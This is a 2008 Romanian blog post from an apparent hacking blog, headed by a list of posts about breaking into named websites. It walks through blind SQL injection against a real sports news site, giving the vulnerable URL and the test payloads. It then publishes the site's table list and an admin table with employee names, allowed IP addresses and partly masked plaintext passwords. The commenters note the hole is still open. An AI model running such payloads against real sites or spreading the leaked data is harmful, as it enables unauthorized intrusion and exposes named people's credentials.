- Apocalipsa dupa Nemessis
- Cand dorinta de afirmare depaseste granitele bunului simt – PaxNwo un leecher ordinar
- Cum sa iti protejezi adresa e-mail si datele confidentiale din aceasta
- Mi s-a furat id-ul de messenger/adresa e-mail. Ce sa fac?
- Experiment social II – andimoisescu.ro
- Pentru posteritate
- In curand…
- “Hot” de id-uri messenger
- Chiar ca sunteti retardati
- Ce nu se invata la scoala – Vendetta (6)
- Apocalipsa dupa Nemessis in (166 Visits)
- Ce servicii de mail folositi? in (86 Visits)
- This is the end in (85 Visits)
- Hackersblog.org is now blog.rstcenter.com in (58 Visits)
- Raportare vulnerabilitati in (58 Visits)
- News in (55 Visits)
- La multi ani România, la multi ani românilor in (55 Visits)
- Un nou membru in (54 Visits)
- De reţinut in (54 Visits)
- So... lol in (51 Visits)
- Mi s-a furat id-ul de messenger/adresa e-mail. Ce sa fac? in (778 Visits)
- SMS scam (1) in (97 Visits)
- Hi5.com coders read this in (94 Visits)
- Dezinformare sau proasta informare? in (78 Visits)
- Si tentativele de phishing pot fi amuzante in (76 Visits)
- Phishing Bancpost in (74 Visits)
- Phishing Raiffeisen cu atasament html in (71 Visits)
- [Utilitare] Suna gratis de pe internet sau de pe iPhone in (228 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in (188 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (164 Visits)
- Cum sa iti protejezi adresa e-mail si datele confidentiale din aceasta in (162 Visits)
- Despre CSRF, hi5.com, cum sa trisezi la concursuri s.a.m.d. in (154 Visits)
- Virusi in clipuri video [how to] in (148 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (130 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (127 Visits)
- Ca musca in... in (87 Visits)
- Internet vs. privacy (1) in (60 Visits)
- Simpatie.ro, matrimoniale3x.ro, apetisant.ro, deliciu.ro , etc Sql injection in (735 Visits)
- usa.kaspersky.com hacked ... full database acces , sql injection in (544 Visits)
- RedTube.com ... The Free Sex Video Community in (185 Visits)
- Yahoo! epic fail - permanent xss unleashed in (155 Visits)
- In atentia BitDefender.com, SQL Injection in (149 Visits)
- Telegraph.co.uk hacked, sql injection in (138 Visits)
- No comment - o2.co.uk (forum) in (136 Visits)
- Facebook hacked - sql injection in (131 Visits)
- eJobs.ro si peste 1.300.000 de conturi cu date personale in (130 Visits)
- F-Secure.com - SQL Injection + Cross Site Scripting in (124 Visits)
- Hacker Uses XSS and Google Street View Data to Determine Physical Location in (97 Visits)
- Wannabe Hackers [1] - Cum sa hack-uiesti RapidShare-ul in (94 Visits)
- Wannabe Hackers [2] - cum sa faci un virus by sppy_hacker in (71 Visits)
- Digital Photocopiers Loaded With Secrets in (63 Visits)
- [Video] The History Of Hacking in (47 Visits)
- Christopher "moot" Poole: The case for anonymity online in (45 Visits)
- OWASP Phishing demo in (34 Visits)
- Owasp5005 Part1 - New zero-day browser exploits - ClickJacking in (33 Visits)
- Email Security - Why You Should Encrypt Your Email - Part One in (32 Visits)
- Hope 2603 – Kevin Mitnick - Life a Computer Hacker – Revealed in (31 Visits)
- Se poate sparge parola de Yahoo? in (753 Visits)
- Forumul Andreei Balan spart in (309 Visits)
- phpBB.ro hacked in (291 Visits)
- Camera de supraveghere a universitatii Alexandru Ioan Cuza din Iasi in (153 Visits)
- Experiment social in (145 Visits)
- Experiment social II - andimoisescu.ro in (136 Visits)
- Doua cu Netbridge si una cu Hi5 in (115 Visits)
- Cand dorinta de afirmare depaseste granitele bunului simt - PaxNwo un leecher ordinar in (110 Visits)
- Site-ul Inspectoratului General al Politiei Romane (igpr.ro) a fost spart in (108 Visits)
- Ce nu se invata la scoala – Vendetta (6) in (107 Visits)
Posted on December 9th, 2008
Avem adresa http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134&ajax=1 . Testam daca parametrul camp_id este vulnerabil la blind sql inection, sau nu. Testul, cum orice in viatza se bazeaza pe conceptul adevar si fals. In cazul nostru, sa vedem ce “raspunde” serverul la un adevar evindent (and 1=1)
http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134+and+1=1&ajax=1 Raspunsul este “adevarat” , adica se incarca pagina originala. Acum “intrebam” ceva fals (and 1=2)
http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134+and+1=2&ajax=1 Raspunsul este “fals”, nu se mai incarca pagina originala, deci serverul este “vorbaretz” si vulnerabil la blind sql injection.
Acum sa aflam versiunea mysql. http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134+and+substring(@@version,1,1)=4&ajax=1
e fals, deci nu e mysql 4.Incercam 5 :
http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134+and+substring(@@version,1,1)=5&ajax=1
True, deci este mysql 5. Pentru a putea extrage date cel mai important este ca functia SELECT sa lucreze.Testam:
http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134+and+(select+1)=1&ajax=1 .Select-ul lucreaza.
(in curand urmeaza partea 2-a tutorialului, pe alt site …sau tot pe gsp ? –alt parametru vulnerabil— cine stie)
Pana atunci va prezint o parte din datele extrase:
Database: gsp_cms
| adm_actions
| adm_module
| adm_perm
| adm_role
| adm_users
| agenda
| articole
| articole_atasate
| articole_autori
| articole_linkuri
| articole_propune_banner
| articole_voturi
| autori
| banner
| bursa_echipe
| bursa_items
| casete
| casete_engine
| casete_layout_zone
| casete_zone
| categorii
| comentarii
| comentarii_per_articole
| comp_campionat
| comp_campionat_echipa
| comp_echipe
| comp_etape
| comp_evenimente
| comp_jucatori
| comp_meciuri
| comp_meciuri_jucatori
| comp_sezoane
| comp_sport
| comp_transferuri
| concurs_dvd
| concurs_epson
| concurs_fault
| concurs_ing_intrebari
| concurs_ing_jucatori
| concurs_usb
| container
| countries
| download
| echipe_atasate
| editii
| emoteicons
| euro2008_flash
| forum_bann
| forum_words
| homepage
| horoscop
| horoscop_sportivi
| horoscop_zodii
| imagini
| imagini_newsletter
| integers
| jo_xml
| log_meciuri_sms
| log_search
| log_search_no_duplicates
| newsletter
| newsletter_add
| newsletter_pozitii
| newsletter_v2
| old_tipuri_eveniment
| poll
| rss
| rss_categories
| rss_images
| rss_rezultat
| seo_info
| seo_keywords
| seo_links
| stiri_meci
| t
| tag_obiecte
| tag_obiecte_old
| tag_words
| test_articole
| test_utf
| tipuri_eveniment
| top_search
| valute
| vars
| voturi
Tabelul: adm_users (cu numele si parolele adminilor – cum altfel decat in text clar)
+——-+———————————————-+———+————+—-+——-+——————–
| admin | allowed_ip | blogger | data | id | mesaj | name | nume_forum | online | pass |
+——-+———————————————-+———+————+—-+——-+——————–
| 0 | 82.76.228.64;85.186.228.232;*.*.*.*;…;… | 0 | 1130779905 | 3 | NULL | adi.nitulescu | cataa | 1 | gsXXXX |
| 0 | 82.76.228.64;82.76.41.225;85.186.228.232;… | 0 | NULL | 4 | NULL | alexandru.carstea | razvan | 0 | /runXXX/ |
| 0 | 82.76.228.64;85.186.228.232;192.168.0.12 | 0 | NULL | 24 | NULL | alexandru.ghiurcau | iulian | 0 | comXXXXX |
| 0 | *.*.*.*;… | 0 | NULL | 48 | NULL | alina.mihaela | tudor | 0 | tigXXXX |
| 0 | *.*.*.*; …;…;…;… | 0 | NULL | 49 | NULL | andreea.moldoveanu | cms_test | 0 | paXXXX |
| 0 | *.*.*.*;…;… | 0 | NULL | 50 | NULL | andrei.craitoiu | cms_simple | 0 | paXXXX |
| 0 | *.*.*.* | 0 | NULL | 52 | NULL | anne.barbu | cji | 0 | cjXXX |
| 0 | *.*.*.*;… | 0 | NULL | 53 | NULL | antonio.robitu | sorin | 0 | admiXXXX |
| 0 | *.*.*.*;… | 0 | NULL | 54 | NULL | beatrice |
masi | 0 | @maXXXX |
| 0 | *.*.*.*;… | 0 | NULL | 55 | NULL | bogdan.luca | Cristi Roman | 0 | papaXXXX |
| 0 | *.*.*.*;… | 0 | NULL | 58 | NULL | cata | stefan horobet | 0 | ursXXXX |
| 0 | *.*.*.* | 0 | NULL | 59 | NULL | cji | marius comper | 0 | haiXXXX |
December 9th, 2008 at 8:54 pm
mie nu-mi merge
…
December 9th, 2008 at 9:01 pm
Ce sa nu mearga? Inca e vulnerabil scriptul respectiv…
December 9th, 2008 at 9:22 pm
nu ii merge in sensul ca el nu vede outpot. evident ca nu vezi, d’aia se numeste BLIND sql injection dooo.
December 10th, 2008 at 10:04 am
Oricine poate sa faca ce faceti voi. Nu e nimic special. http://www.milw0rm.com/papers/202
E usor sa spargi, e greu sa faci.
December 10th, 2008 at 4:14 pm
si sa comentezi la descoperirile altora e usor sa faci. nu e nimic special. e usor sa dai cu gura, greu sa faci ce facem noi.
December 10th, 2008 at 4:28 pm
Intr-adevar foarte greu, te ajuti de sqlmap (automatic SQL injection tool) si urmezi pasii din tutorial
December 10th, 2008 at 4:42 pm
vad ca esti profesor bun, da-le lectii te rog celor de la gsp, sau care au site-uri vulnerabile, nu noua…noi stim sa folosim si sqlmap-ul, am citit si tutorialul respectiv, stim inclusiv sa si securizam un parametru sa nu fie vulnerabil la sql injection…in rest toate cele bune
December 10th, 2008 at 4:47 pm
Gigi, te invit sa citesti disclaimer-ul nostru de la sectiunea ABOUT: http://hackersblog.org/about/
Daca ai fi baiat cu cap, dupa ce ai citi pagina aia ti-ai retrage cuvintele si ai intelege ce se intampla aici defapt.
December 10th, 2008 at 4:55 pm
Tocmai de aceea am pus si eu linkul catre acel tutorial sa vada lumea cat de simplu este in realitate sa faci un sql injection si sa poata lua masuri in consecinta. In rest numai de bine.
December 10th, 2008 at 5:22 pm
Nu a zis nimeni ca ar fi greu sau usor, nu asta e ideea… si totodata pe blogul acesta nu se vorbeste doar despre sqli. Casca ochii mai bine si revizuieste-ti replicile inainte sa le dai frau liber aici sub forma de proteste sau mai stiu eu ce balarii ai tu in cap.